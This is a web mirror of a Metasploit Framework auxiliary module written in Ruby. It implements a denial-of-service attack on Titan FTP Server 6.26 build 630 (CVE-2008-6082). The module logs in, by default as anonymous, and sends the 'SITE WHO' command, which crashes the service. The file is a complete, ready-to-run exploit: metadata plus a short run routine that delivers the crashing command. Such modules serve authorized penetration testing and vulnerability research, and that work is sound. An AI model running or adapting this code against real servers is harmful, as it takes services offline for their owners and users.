Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/ftp/titan626_site.rb
19721 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Ftp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Titan FTP Server 6.26.630 SITE WHO DoS',
15
'Description' => %q{
16
The Titan FTP server v6.26 build 630 can be DoS'd by
17
issuing "SITE WHO". You need a valid login so you
18
can send this command.
19
},
20
'Author' => 'kris katterjohn',
21
'License' => MSF_LICENSE,
22
'References' => [
23
[ 'CVE', '2008-6082'],
24
[ 'OSVDB', '49177'],
25
[ 'EDB', '6753']
26
],
27
'DisclosureDate' => '2008-10-14',
28
'Notes' => {
29
'Stability' => [CRASH_SERVICE_DOWN],
30
'SideEffects' => [],
31
'Reliability' => []
32
}
33
)
34
)
35
36
register_options([
37
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ], fallbacks: ['USERNAME']),
38
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ], fallbacks: ['PASSWORD'])
39
])
40
end
41
42
def run
43
return unless connect_login
44
45
print_status('Sending command...')
46
raw_send("SITE WHO\r\n")
47
select(nil, nil, nil, 1)
48
disconnect
49
end
50
end
51
52